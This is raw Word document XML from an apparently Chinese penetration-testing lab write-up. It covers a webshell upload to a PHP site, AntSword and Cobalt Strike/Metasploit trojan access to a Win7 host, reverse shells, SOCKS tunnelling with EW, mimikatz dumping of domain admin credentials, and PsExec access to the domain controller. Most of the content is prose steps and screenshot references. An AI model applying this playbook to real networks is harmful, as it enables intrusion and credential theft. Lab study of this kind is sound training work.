        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="483ABBF6" wp14:editId="1049A5E9">
            <wp:extent cx="6635750" cy="1734185"/>
            <wp:effectExtent l="0" t="0" r="6350" b="5715"/>
            <wp:docPr id="7" name="图片 7" descr="屏幕截图 2024-08-18 194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 2024-08-18 1947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141C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查找漏洞得到，逐一尝试，在第四个页面中打开</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEE4526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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="746E9171" wp14:editId="50CE85EC">
            <wp:extent cx="6408420" cy="3656330"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1270"/>
            <wp:docPr id="8" name="图片 8" descr="屏幕截图 2024-08-18 20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8-18 2011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8783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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="1DF4A1E7" wp14:editId="4CF3D55D">
            <wp:extent cx="6638925" cy="2926715"/>
            <wp:effectExtent l="0" t="0" r="3175" b="6985"/>
            <wp:docPr id="9" name="图片 9" descr="屏幕截图 2024-08-18 20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8-18 2014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9C15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上传一个</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，该URL利用漏洞来进行远程代码执行，执行任意系统命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6396B641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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="414D1E56" wp14:editId="4691A302">
            <wp:extent cx="6640830" cy="1897380"/>
            <wp:effectExtent l="0" t="0" r="1270" b="7620"/>
            <wp:docPr id="10" name="图片 10" descr="屏幕截图 2024-08-18 202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4-08-18 2028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D9A5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使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>打开该网页目录，能够看到新加进去的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>和原有的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>add.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="11DC565A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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="5C274E6E" wp14:editId="6AF8AF78">
            <wp:extent cx="6626860" cy="2700655"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="11" name="图片 11" descr="屏幕截图 2024-08-18 20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 2024-08-18 2038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7224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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>使用蚁剑连接</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>网址</w:t>
      </w:r>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://192.168.135.150/shell.php" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>http://192.168.135.150/shell.php</w:t>
      </w:r>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>,打开</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>add.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，得到password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CCB8CE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/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="617082CE" wp14:editId="34570E8D">
            <wp:extent cx="6645275" cy="4485005"/>
            <wp:effectExtent l="0" t="0" r="9525" b="1079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75A0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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="0AD5F86A" wp14:editId="4DA7AF08">
            <wp:extent cx="6627495" cy="2028825"/>
            <wp:effectExtent l="0" t="0" r="1905" b="3175"/>
            <wp:docPr id="14" name="图片 14" descr="屏幕截图 2024-08-18 20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08-18 2054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5D35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将password解码得到密码为admins，登录成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31078B41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/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="34F2AC69" wp14:editId="5CCCFE33">
            <wp:extent cx="6628130" cy="1844675"/>
            <wp:effectExtent l="0" t="0" r="1270" b="9525"/>
            <wp:docPr id="13" name="图片 13" descr="屏幕截图 2024-08-18 20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08-18 2052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FDA8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/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="3F40E45C" wp14:editId="37858499">
            <wp:extent cx="6625590" cy="3368675"/>
            <wp:effectExtent l="0" t="0" r="3810" b="952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0BC9F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sz w:val="24"/>
        </w:rPr>
        <w:t>使用工具</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>生成木马，根据生成内容我们能够看出生成的是powshell.exe，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在蚁剑中</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>打开终端执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A0E824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sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="183CBFFF" wp14:editId="6D9E4804">
            <wp:extent cx="6629400" cy="3905250"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="16" name="图片 16" descr="屏幕截图 2024-08-18 21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4-08-18 21060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98BF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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="6C3DAC00" wp14:editId="14FC613B">
            <wp:extent cx="6637655" cy="1526540"/>
            <wp:effectExtent l="0" t="0" r="4445" b="10160"/>
            <wp:docPr id="17" name="图片 17" descr="屏幕截图 2024-08-18 21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4-08-18 21305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D844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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在蚁剑中确认蚁剑所连</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>地址为192.168.138.136</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CB6C5C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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="312AD732" wp14:editId="538E6CEF">
            <wp:extent cx="5965825" cy="3664585"/>
            <wp:effectExtent l="0" t="0" r="3175" b="5715"/>
            <wp:docPr id="1" name="图片 1" descr="屏幕截图 2024-08-18 21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08-18 21353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0674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lastRenderedPageBreak/>
        <w:t>执行成功之后的kali页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52493B86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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="19F5E983" wp14:editId="0A0C1485">
            <wp:extent cx="6634480" cy="2169160"/>
            <wp:effectExtent l="0" t="0" r="7620" b="2540"/>
            <wp:docPr id="18" name="图片 18" descr="屏幕截图 2024-08-19 10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08-19 1020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6409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cs上线，将生成的木马放在win7phpstudy的目录下，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>使用蚁剑连接</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>到win7中，能够看到木马已经被植入，在终端中执行木马，cs成功上线，我们能够看到win7现在是以管理员身份运行的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B73A934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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="0C7BE233" wp14:editId="07A174A1">
            <wp:extent cx="6642735" cy="5137785"/>
            <wp:effectExtent l="0" t="0" r="12065" b="5715"/>
            <wp:docPr id="19" name="图片 19" descr="屏幕截图 2024-08-19 23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4-08-19 2346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F3FF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输入shell，反弹权限，在kali中得到win7的权限，开始信息收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7753821B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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="5803FD82" wp14:editId="2C2146D5">
            <wp:extent cx="6337935" cy="5716270"/>
            <wp:effectExtent l="0" t="0" r="12065" b="11430"/>
            <wp:docPr id="20" name="图片 20" descr="屏幕截图 2024-08-20 09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08-20 0910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571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4B68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发现内网</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>网</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>段138，域名为sun.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E60A986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使用内网穿透工具EW，本实验使用反向连接，即使用win7连接kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D54643A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首先在kali中将端口1090提出的请求转发到2233端口，在win7中执行，开启socks服务，访问kali的2233端口就可以进行kali的socks服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5995EA26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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="13A734B8" wp14:editId="109E3A6F">
            <wp:extent cx="6643370" cy="2502535"/>
            <wp:effectExtent l="0" t="0" r="11430" b="12065"/>
            <wp:docPr id="24" name="图片 24" descr="屏幕截图 2024-08-20 213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4-08-20 21380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8EFE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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="213461A8" wp14:editId="71933FBF">
            <wp:extent cx="6636385" cy="610870"/>
            <wp:effectExtent l="0" t="0" r="5715" b="11430"/>
            <wp:docPr id="23" name="图片 23" descr="屏幕截图 2024-08-20 21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08-20 2138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8249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下一步</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>开始域控渗透</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2F490675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返回</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>模块中，使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>模块抓取密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F898B7A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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="39017ACC" wp14:editId="08D0BA0E">
            <wp:extent cx="6642735" cy="3801110"/>
            <wp:effectExtent l="0" t="0" r="12065" b="8890"/>
            <wp:docPr id="25" name="图片 25" descr="屏幕截图 2024-08-20 23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08-20 2300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7A0B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这里出现了报错，原因是因为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>是32位的，无法访问64位的，关于</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的详细论述在后文会详细阐述，所以将它迁移到64位</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122EF714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Ps命令：用于显示目标系统上当前运行的经常列表，类似于Linux系统中的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC97024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Migrate 348命令：将当前的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>命令会话迁移到目标系统上的进程id位348的经常中，选择csrss.exe的原因是：进程中出现了两个csrss.exe，既有可能是恶意软件伪装的进程，这里将powshell.exe进程给到348的进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DFDF90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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="4A7E6BAC" wp14:editId="6EF5955A">
            <wp:extent cx="6642735" cy="5166360"/>
            <wp:effectExtent l="0" t="0" r="12065" b="2540"/>
            <wp:docPr id="26" name="图片 26" descr="屏幕截图 2024-08-20 215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08-20 2153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398E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拿到域管理员的用户名和密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FCD6CD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sz w:val="24"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>登录域控</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C95021" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars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由于使用的是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>模式，无法</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>利用域控登录</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，故先使用cs提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E13AF17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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="5E6F7ECD" wp14:editId="766067E5">
            <wp:extent cx="4192905" cy="3414395"/>
            <wp:effectExtent l="0" t="0" r="10795" b="1905"/>
            <wp:docPr id="27" name="图片 27" descr="屏幕截图 2024-08-21 091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4-08-21 0915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290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12E5" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:ind w:left="482" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>提权为</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
